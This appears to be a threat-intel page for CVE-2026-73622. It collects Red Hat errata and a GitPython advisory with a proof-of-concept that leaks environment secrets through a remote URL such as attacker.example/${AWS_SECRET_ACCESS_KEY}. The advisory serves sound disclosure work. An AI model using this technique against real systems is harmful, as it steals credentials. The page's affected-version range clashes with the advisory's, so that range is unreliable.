Skip to main content

Threats Tagged 'cve-2026-73622'

View all threats tagged with 'cve-2026-73622'. Filter and sort to focus on specific types of threats.

Pro Console Lifetime

Stop chasing alerts. Route them.

Start free, then upgrade once to turn Radar into an automated delivery engine for your security stack.

Custom feeds / Automations: email, Slack, webhooks, SIEM/MISP / API access (baseline limits)

View Plans & Pricing

API access activates after upgrading in Console -> Billing.

Breach by OffSeqOFFSEQFRIENDS — 25% OFF

Check if your credentials are on the dark web

Instant breach scanning across billions of leaked records. Free tier available.

Scan now

Filter Threats

Narrow down the results by type, severity, or affected countries

Search threats by title, CVE ID, or description. Maximum 100 characters.
Active filters (1):Tag: cve-2026-73622

Threats Tagged 'cve-2026-73622'

Click on any threat for detailed analysis and mitigation recommendations

Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language. For details about this release, refer to the release notes listed in the References section.

Join the discussion

Red Hat Lightspeed in Satellite analyzes system health and configuration by applying predefined rules to a small set of local data, such as installed packages, running services, and configuration settings.

Join the discussion

Red Hat Lightspeed in Satellite analyzes system health and configuration by applying predefined rules to a small set of local data, such as installed packages, running services, and configuration settings.

Join the discussion

Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments. Security Fix(es): * ansible-core: argument injection in ansible-galaxy role install leads to arbitrary code execution (CVE-2026-11332) * ansible-core: argument injection in ansible-galaxy collection install via git clone (incomplete fix for CVE-2026-11332) (CVE-2026-16493) * openvox-server: jackson-databind: Arbitrary code execution via PolymorphicTypeValidator bypass (CVE-2026-54512) * puppetserver: jackson-databind: Arbitrary code execution via PolymorphicTypeValidator bypass (CVE-2026-54512) * rubygem-jwt: ruby-jwt: Authentication bypass due to empty key in HMAC verification (CVE-2026-45363) * python-aiohttp: AIOHTTP: Denial of Service via malformed HTTP responses (CVE-2026-69244) * python-aiohttp: AIOHTTP: HTTP Request Smuggling via WebSocket Upgrade (CVE-2026-69243) * python-aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load() (CVE-2026-34993) * openvox-server: jackson-core: Denial of Service via incomplete fix in async JSON parser (CVE-2026-68494) * openvox-server: Eclipse Jetty: Information disclosure due to retained HTTP/1.1 trailers across connections (CVE-2026-10051) * python-gitpython: GitPython: Arbitrary File Overwrite via improper git option validation (CVE-2026-73624) * python-gitpython: GitPython: Remote Code Execution via kwarg value smuggling (CVE-2026-73625) * python-gitpython: GitPython: Information disclosure via environment variable expansion in URL handling (CVE-2026-73622) * python-gitpython: GitPython: Remote Code Execution via malicious Git template (CVE-2026-73623) * python-gitpython: GitPython: Arbitrary file overwrite and read via unsafe git option forwarding (CVE-2026-73620) * python-gitpython: GitPython: Arbitrary code execution via improper validation of clone options (CVE-2026-42284) * python3.12-gitpython: GitPython: Arbitrary code execution via improper validation of clone options (CVE-2026-42284) * python-gitpython: GitPython: Arbitrary command execution due to bypass of dangerous Git option checks (CVE-2026-42215) * python3.12-gitpython: GitPython: Arbitrary command execution due to bypass of dangerous Git option checks (CVE-2026-42215) * python-gitpython: GitPython: Arbitrary code execution via injected newlines in Git configuration (CVE-2026-44244) * python3.12-gitpython: GitPython: Arbitrary code execution via injected newlines in Git configuration (CVE-2026-44244) * python-gitpython: GitPython: Arbitrary file creation via path traversal in .gitmodules submodule names (CVE-2026-76222) * python3.12-gitpython: GitPython: Arbitrary file creation via path traversal in .gitmodules submodule names (CVE-2026-76222) * python-gitpython: GitPython: Remote Code Execution via malicious Git hooks (CVE-2026-76218) * python3.12-gitpython: GitPython: Remote Code Execution via malicious Git hooks (CVE-2026-76218) * python-gitpython: GitPython: Arbitrary command execution via crafted kwargs (CVE-2026-76220) * python3.12-gitpython: GitPython: Arbitrary command execution via crafted kwargs (CVE-2026-76220) * python-gitpython: GitPython: Arbitrary File Overwrite via `git read-tree` option injection (CVE-2026-76219) * python3.12-gitpython: GitPython: Arbitrary File Overwrite via `git read-tree` option injection (CVE-2026-76219) * python-gitpython: GitPython: Arbitrary code execution via config-name injection (CVE-2026-76221) * python3.12-gitpython: GitPython: Arbitrary code execution via config-name injection (CVE-2026-76221)

Join the discussion

## Summary The fix for [GHSA-rwj8-pgh3-r573](https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rwj8-pgh3-r573) stopped `Repo.clone_from()` from running caller-supplied URLs through `os.path.expandvars()`, but it guarded only that one caller. `Remote.create()` — reached from the public `Repo.create_remote()` and its `Remote.add()` alias — still passes an attacker-influenceable URL through `Git.polish_url()` with the default `expand_vars=True`. A URL such as `http://attacker.example/${AWS_SECRET_ACCESS_KEY}/repo.git` is expanded server-side to embed the hosting process's environment secret, written into `.git/config`, and then transmitted to the attacker's host on the next `fetch`/`pull`. This is the same primitive and same "import repository from URL" threat model the advisory describes, via the sibling caller the fix missed. ## Root Cause Fix commit [`8ac5a305`](https://github.com/gitpython-developers/GitPython/commit/8ac5a30519b6f4af85398b9b9d7064ff4d452da2) added an `expand_vars` parameter to `Git.polish_url()` (default `True`) and used `expand_vars=False` only in `Repo._clone()` ([`git/repo/base.py:1455`](https://github.com/gitpython-developers/GitPython/blob/3.1.53/git/repo/base.py#L1455)). The shared helper's dangerous default was left in place, and the other callers were not updated. [`git/remote.py:811`](https://github.com/gitpython-developers/GitPython/blob/3.1.53/git/remote.py#L811), `Remote.create`: ```python url = Git.polish_url(url) # expand_vars=True -> os.path.expandvars(url) if not allow_unsafe_protocols: Git.check_unsafe_protocols(url) # https:// carrying the secret passes repo.git.remote(scmd, "--", name, url, **kwargs) # expanded URL written to .git/config ``` `check_unsafe_protocols()` runs *after* expansion here, so it rejects an `ext::` payload but does nothing about an `https://` URL that carries an expanded secret in its path or host — the disclosure primitive. The same unguarded call also sits at [`git/objects/submodule/base.py:611`](https://github.com/gitpython-developers/GitPython/blob/3.1.53/git/objects/submodule/base.py#L611) (`Submodule.add`), which writes the expanded URL into `.gitmodules` (a tracked file) and `.git/config`. ## Steps to Reproduce ### Prerequisites - Python 3.9+ - `git` on `PATH` (for the fetch step) - GitPython 3.1.53 (installed below) ### Step 1: Install GitPython 3.1.53 in a clean venv ```bash mkdir /tmp/gp-remote-poc && cd /tmp/gp-remote-poc python3 -m venv venv ./venv/bin/pip install gitpython==3.1.53 ``` ### Step 2: Write the PoC ```bash cat > poc.py <<'PYEOF' #!/usr/bin/env python3 """Env-var exfiltration via Repo.create_remote() URL. Sentinel data only.""" import http.server import os import tempfile import threading import git print("gitpython version:", git.__version__) # Sentinel standing in for a process secret such as AWS_SECRET_ACCESS_KEY. SENTINEL = "leaked-a1b2c3-SENTINEL-do-not-use" os.environ["GP_SENTINEL_SECRET"] = SENTINEL # Local HTTP server standing in for attacker.example. captured = [] class Handler(http.server.BaseHTTPRequestHandler): def do_GET(self): captured.append(self.path) self.send_response(404) self.end_headers() def log_message(self, *a): pass srv = http.server.HTTPServer(("127.0.0.1", 0), Handler) port = srv.server_address[1] threading.Thread(target=srv.serve_forever, daemon=True).start() # Attacker-controlled URL handed to an "import from URL" feature. attacker_url = "http://127.0.0.1:%d/steal/${GP_SENTINEL_SECRET}/repo.git" % port def norm(s): # display the ephemeral listener port as a stable placeholder return s.replace("127.0.0.1:%d" % port, "127.0.0.1:PORT") print("attacker-supplied URL :", norm(attacker_url)) repo = git.Repo.init(tempfile.mkdtemp(prefix="gp-victim-")) remote = repo.create_remote("evil", attacker_url) # public API stored = repo.remote("evil").url print("stored remote URL :", norm(stored)) print("SENTINEL in git config:", SENTINEL in stored) try: remote.fetch() # transmits the expanded URL to the attacker host except Exception: pass # fetch fails after the request is already sent srv.shutdown() over_network = any(SENTINEL in p for p in captured) print("HTTP paths received :", [norm(p) for p in captured]) print("SENTINEL over network :", over_network) print() if SENTINEL in stored and over_network: print("VULNERABLE: env-var expanded into stored URL AND transmitted to attacker host") elif SENTINEL in stored: print("VULNERABLE: env-var expanded into stored git-config URL") else: print("not reproduced") PYEOF ``` ### Step 3: Run it ```bash cd /tmp/gp-remote-poc && ./venv/bin/python poc.py ``` Expected output (the listener's ephemeral port is shown as `PORT`): ``` gitpython version: 3.1.53 attacker-supplied URL : http://127.0.0.1:PORT/steal/${GP_SENTINEL_SECRET}/repo.git stored remote URL : http://127.0.0.1:PORT/steal/

Join the discussion

A vulnerability in GitPython's Repo.create_remote() and Remote.add() methods allows environment variable expansion in URLs, leading to potential secret exfiltration. The flaw is due to an incomplete fix of a previous advisory, where only Repo.clone_from() was protected from expanding environment variables in URLs. The vulnerable methods still expand variables by default, causing secrets in environment variables to be embedded in repository configuration files and transmitted to attacker-controlled hosts during fetch or pull operations. This affects GitPython versions from 3.4.1 up to but not including 3.24.0. A patch is available to address this issue.

Join the discussion

Showing 1 to 6 of 6 results

Filters:Tag: cve-2026-73622
Page 1 of 1
OffSeq TrainingCredly Certified

Lead Pen Test Professional

Technical5-day eLearningPECB Accredited
View courses